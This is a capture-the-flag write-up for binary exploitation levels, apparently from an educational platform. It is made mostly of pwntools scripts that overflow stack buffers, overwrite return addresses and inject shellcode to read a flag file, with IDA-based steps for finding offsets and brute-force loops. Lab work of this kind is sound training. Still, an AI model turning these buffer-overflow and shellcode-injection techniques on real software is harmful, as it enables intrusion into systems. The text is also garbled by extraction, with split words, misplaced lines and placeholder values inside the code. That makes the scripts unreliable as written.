Professional Documents
Culture Documents
Binary Exploitation Write Up PT 2
Binary Exploitation Write Up PT 2
1
M
import pwn
with pwn.process("/challenge/babymem_level2.1") as process:
payload = b'a'*<inputBufferSize>+ <injection>.to_bytes(4, 'little') # see note
process.write(str(len(payload))+"\n")
process.write(payload)
print(process.readallS())
ote: use ida to find both. for inputBufferSize, go to challenge, look under the second lea where
N
add is, should be a number with h after, convert to decimal and that is your input (mine was
28h=40). For the injection, stay in challenge but scroll all the way down till you see short
loc_1CD5, double click, and look at cmp, that hex num is going to be your injection. So mine
looked like this: payload = b'a'*40+0x21B14E3B.to_bytes(4, 'little')
E: Level 3.1
M
from pwn import *
import pwn
pwn.context.update(arch="amd64")
pwn.context.log_level = "error"
for i in range(1, 200):
print("hello")
with pwn.process("/challenge/babymem_level3.0")as p:
p.clean()
p.send(b'10000')
p.clean
print(i)
payload = b'A'*i
payload += p32(hexvalue) # see note
p.write(payload)
out = p.clean().decode()
if "pwn" in out:
print(out)
ote: to find the hex value go to ida, to the win function, decompile it, then
N
click on the puts where it says (“You win! Here is your flag”) and the number at the bottom of
your screen is your hex value. So mine was (401F57) but I put 0x401F57 in the actual code
E: Level 6.1
M
from pwn import *
import pwn
pwn.context.update(arch="amd64")
pwn.context.log_level = "error"
for i in range(0, 200):
rint(i)
p
for s in range(40):
with pwn.process("/challenge/babymem_level6.1") as p:
p.clean()
p.sendline('10000')
p.clean
print(i)
payload = b'\x00' * 1st val + b'2nd val' # find in ida
p.write(payload)
out = p.readallS()
if "pwn" in out:
print(out)
break
To find 1st val:
1. Go to ida
2. Navigate to the challenge function on the left
3. Find the first "add rsp, 0xFFFFFFFFFFFFFFFFFFF??h" line
4. The ?? is your hex value. Simply convert to decimal, add 8 to it, and then convert that
back to hex (important)
5. If you didn’t have the above line and it is sub instead, follow the steps to find the 1st
value in levels 7.0/7.1
6. This is your 1st val
E: Level 8.0/8.1
M
from pwn import *
import pwn
pwn.context.update(arch="amd64")
pwn.context.log_level = "error"
rint(i)
p
for s in range(40):
with pwn.process("/challenge/babymem_level8.0") as p:
p.clean()
p.sendline('10000')
p.clean
print(i)
payload = b'\x00' * 1st val + b'2nd val' # find in ida like level 7
.write(payload)
p
out = p.readalls()
if "pwn" in out:
print(out)
break
E: Level 1.0
P
1. run challenge
2. see where it says, “input buffer begins at…” and count how many lines there are from that to
the 2nd to last line, then do that number * 8 so mine is 13*8=104
3. It should say “shellcode at xxxxx!” in the help text, paste the address (xxxxx) into the template
while(1):
for x in range(30):
from pwn import *
p = process("/challenge/toddlerone_level1.0")
context.arch="amd64"
sc = asm(f"""
{shellcraft.cat2('/flag')}
""")
p.send(sc)
size = x * 8
payload = b'a'*size + p64(shellcode address found in ida)
p.send(str(len(payload)) + "\n")
p.send(payload)
print(p.readallS())
E: Level 2.0
P
1. run challenge
2. repeat step 2 from above. write it down in the template below (yes the code is different)
sc = asm(f"""
{shellcraft.cat2('/flag')}
""")
rint(p.recvuntil('size: '))
p
p.sendline(str(size))
rint(p.recvuntil(b'bytes)!'))
p
p.send(payload)
p.interactive()
. grab the address in the last line of help text and add 0x18 to it – this is shellcode address to
3
put in code template (use an online hex calculator)
* for example mine is 0x7f…fd2a8+0x18 = 0x7f…fd2c0
4. enter values into the code template from above 0x00007fffffffd2c0
E: Level 2.1
P
This is going to be another brute force method
1. First, try running your code from 2.0
2. If that works, good for you
3. If not, pick a random line count between 1 and 30
4. Repeat until you get the flag
Results may vary